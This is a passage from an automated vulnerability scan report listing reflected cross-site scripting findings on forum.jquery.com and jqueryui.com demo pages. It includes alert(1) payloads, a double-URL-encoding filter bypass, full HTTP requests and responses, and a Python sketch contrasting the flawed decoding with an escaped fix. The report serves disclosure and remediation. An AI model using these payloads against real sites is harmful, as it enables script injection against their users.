Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AF93BC4D343B03132D167D13EC07F3D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:25 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/scottjehl?621fb"><script>alert(1)</script>c784026de5e=1&forumGroupUrl=jquery">
...[SNIP]...

1.18. http://forum.jquery.com/user/wycats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb36"><script>alert(1)</script>b9cc4e4f2c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/wycats?edb36"><script>alert(1)</script>b9cc4e4f2c2=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=991BADAD0230B70297FEBECFA7A4CBD1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:24 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/wycats?edb36"><script>alert(1)</script>b9cc4e4f2c2=1&forumGroupUrl=jquery">
...[SNIP]...

1.19. http://jqueryui.com/demos/accordion [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/accordion

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b2754%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e926f00d8d15 was submitted in the REST URL parameter 2. This input was echoed as b2754</title><script>alert(1)</script>926f00d8d15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
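The Python below is an added example, not part of the XSS.CX report and not jqueryui.com's code; it models the decode-filter-decode ordering that the finding describes and applies equally to findings 1.20 through 1.35, which differ only in the demo name and the random marker. The blacklist, the second urldecode, the ucfirst step and the title template are assumptions chosen to reproduce the observed response; only the request path and the echoed title line come from the finding.

```python
from html import escape
from urllib.parse import unquote

# Constructed inputs. DOUBLE_ENCODED is REST URL parameter 2 exactly as sent
# in finding 1.19; SINGLE_ENCODED is the same payload encoded only once.
DOUBLE_ENCODED = ("accordionb2754%253c%252ftitle%253e%253cscript%253e"
                  "alert%25281%2529%253c%252fscript%253e926f00d8d15")
SINGLE_ENCODED = ("accordionb2754%3c%2ftitle%3e%3cscript%3e"
                  "alert%281%29%3c%2fscript%3e926f00d8d15")

BLOCKED = '<>"\''
TITLE = "<title>jQuery UI - %s Demos &amp; Documentation</title>"


def filter_passes(value):
    """Assumed blacklist of the kind the finding describes: reject any value
    containing a literal character commonly used in XSS payloads."""
    return not any(c in value for c in BLOCKED)


def ucfirst(s):
    """PHP-style ucfirst, assumed to explain 'accordion' -> 'Accordion'."""
    return s[:1].upper() + s[1:]


def render_title_vulnerable(raw_segment):
    """Assumed vulnerable pipeline: the server decodes once, the blacklist
    runs on that value, then the application decodes a second time and
    writes the result into <title> unescaped. Returns None if the filter
    rejected the request."""
    once = unquote(raw_segment)        # the web server's decode
    if not filter_passes(once):        # validation happens here ...
        return None
    twice = unquote(once)              # ... canonicalisation happens here
    return TITLE % ucfirst(twice)


def render_title_fixed(raw_segment):
    """Hardened pipeline: no second decode, and the value is HTML-escaped
    at the point it is written into the document."""
    once = unquote(raw_segment)
    if not filter_passes(once):
        return None
    return TITLE % escape(ucfirst(once), quote=True)


def decode_depth(value, limit=5):
    """How many percent-decoding passes it takes to reach a fixed point.
    A value above 1 on the wire means the client multi-encoded the value,
    a useful triage signal when reviewing logs for this bypass."""
    depth = 0
    while depth < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, depth = decoded, depth + 1
    return depth


def title_intact(markup):
    """Check: exactly one </title> and no script element in the result."""
    return markup.count("</title>") == 1 and "<script" not in markup.lower()


if __name__ == "__main__":
    print(render_title_vulnerable(SINGLE_ENCODED))   # the blacklist fires
    print(render_title_vulnerable(DOUBLE_ENCODED))   # title closed early
    print(render_title_fixed(DOUBLE_ENCODED))        # escaped, title intact
    print(decode_depth(DOUBLE_ENCODED), decode_depth(SINGLE_ENCODED))
```

The single-encoded payload is stopped by the blacklist, the double-encoded one reproduces the title line in the response below character for character, and the fixed renderer leaves the once-decoded `%3c` sequences inert. Output escaping is the fix; the blacklist is kept only to show it is no longer the control that matters.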

Request

GET /demos/accordionb2754%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e926f00d8d15 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Accordionb2754</title><script>alert(1)</script>926f00d8d15 Demos &amp; Documentation</title>
   
   <meta name="keywords" conten
...[SNIP]...

1.20. http://jqueryui.com/demos/addClass [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/addClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a598d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78e80d742b6 was submitted in the REST URL parameter 2. This input was echoed as a598d</title><script>alert(1)</script>78e80d742b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/addClassa598d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78e80d742b6 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - AddClassa598d</title><script>alert(1)</script>78e80d742b6 Demos &amp; Documentation</title>
   
   <meta name="keywords" content
...[SNIP]...

1.21. http://jqueryui.com/demos/animate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/animate

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2dd49%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80b730e6bf2 was submitted in the REST URL parameter 2. This input was echoed as 2dd49</title><script>alert(1)</script>80b730e6bf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/animate2dd49%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80b730e6bf2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7892

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Animate2dd49</title><script>alert(1)</script>80b730e6bf2 Demos &amp; Documentation</title>
   
   <meta name="keywords" content=
...[SNIP]...

1.22. http://jqueryui.com/demos/autocomplete [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/autocomplete

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 37618%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e803fc703c was submitted in the REST URL parameter 2. This input was echoed as 37618</title><script>alert(1)</script>3e803fc703c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/autocomplete37618%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e803fc703c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7897

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Autocomplete37618</title><script>alert(1)</script>3e803fc703c Demos &amp; Documentation</title>
   
   <meta name="keywords" con
...[SNIP]...

1.23. http://jqueryui.com/demos/button [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/button

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 93fdc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e626eca3fe was submitted in the REST URL parameter 2. This input was echoed as 93fdc</title><script>alert(1)</script>2e626eca3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/button93fdc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e626eca3fe HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Button93fdc</title><script>alert(1)</script>2e626eca3fe Demos &amp; Documentation</title>
   
   <meta name="keywords" content="
...[SNIP]...

1.24. http://jqueryui.com/demos/datepicker [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/datepicker

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 396a5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa1066960be was submitted in the REST URL parameter 2. This input was echoed as 396a5</title><script>alert(1)</script>fa1066960be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/datepicker396a5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa1066960be HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7895

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Datepicker396a5</title><script>alert(1)</script>fa1066960be Demos &amp; Documentation</title>
   
   <meta name="keywords" conte
...[SNIP]...

1.25. http://jqueryui.com/demos/dialog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/dialog

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e3220%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e374ba0e42cd was submitted in the REST URL parameter 2. This input was echoed as e3220</title><script>alert(1)</script>374ba0e42cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/dialoge3220%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e374ba0e42cd HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Dialoge3220</title><script>alert(1)</script>374ba0e42cd Demos &amp; Documentation</title>
   
   <meta name="keywords" content="
...[SNIP]...

1.26. http://jqueryui.com/demos/draggable [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/draggable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 913fc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea299844092b was submitted in the REST URL parameter 2. This input was echoed as 913fc</title><script>alert(1)</script>a299844092b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/draggable913fc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea299844092b HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Draggable913fc</title><script>alert(1)</script>a299844092b Demos &amp; Documentation</title>
   
   <meta name="keywords" conten
...[SNIP]...

1.27. http://jqueryui.com/demos/droppable [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/droppable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a0098%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c0df0c52f2 was submitted in the REST URL parameter 2. This input was echoed as a0098</title><script>alert(1)</script>4c0df0c52f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/droppablea0098%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c0df0c52f2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Droppablea0098</title><script>alert(1)</script>4c0df0c52f2 Demos &amp; Documentation</title>
   
   <meta name="keywords" conten
...[SNIP]...

1.28. http://jqueryui.com/demos/effect [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/effect

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7468d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3e432863c5 was submitted in the REST URL parameter 2. This input was echoed as 7468d</title><script>alert(1)</script>c3e432863c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/effect7468d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3e432863c5 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Effect7468d</title><script>alert(1)</script>c3e432863c5 Demos &amp; Documentation</title>
   
   <meta name="keywords" content="
...[SNIP]...

1.29. http://jqueryui.com/demos/hide [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/hide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e052a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93d47fc3cbb was submitted in the REST URL parameter 2. This input was echoed as e052a</title><script>alert(1)</script>93d47fc3cbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/hidee052a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93d47fc3cbb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7889

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Hidee052a</title><script>alert(1)</script>93d47fc3cbb Demos &amp; Documentation</title>
   
   <meta name="keywords" content="jq
...[SNIP]...

1.30. http://jqueryui.com/demos/position [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/position

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b47ea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec08edf90c4c was submitted in the REST URL parameter 2. This input was echoed as b47ea</title><script>alert(1)</script>c08edf90c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/positionb47ea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec08edf90c4c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Positionb47ea</title><script>alert(1)</script>c08edf90c4c Demos &amp; Documentation</title>
   
   <meta name="keywords" content
...[SNIP]...

1.31. http://jqueryui.com/demos/progressbar [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/progressbar

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 31403%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e47c6884e7ee was submitted in the REST URL parameter 2. This input was echoed as 31403</title><script>alert(1)</script>47c6884e7ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/progressbar31403%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e47c6884e7ee HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Progressbar31403</title><script>alert(1)</script>47c6884e7ee Demos &amp; Documentation</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.32. http://jqueryui.com/demos/removeClass [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/removeClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a472b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4022b6ec612 was submitted in the REST URL parameter 2. This input was echoed as a472b</title><script>alert(1)</script>4022b6ec612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/removeClassa472b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4022b6ec612 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
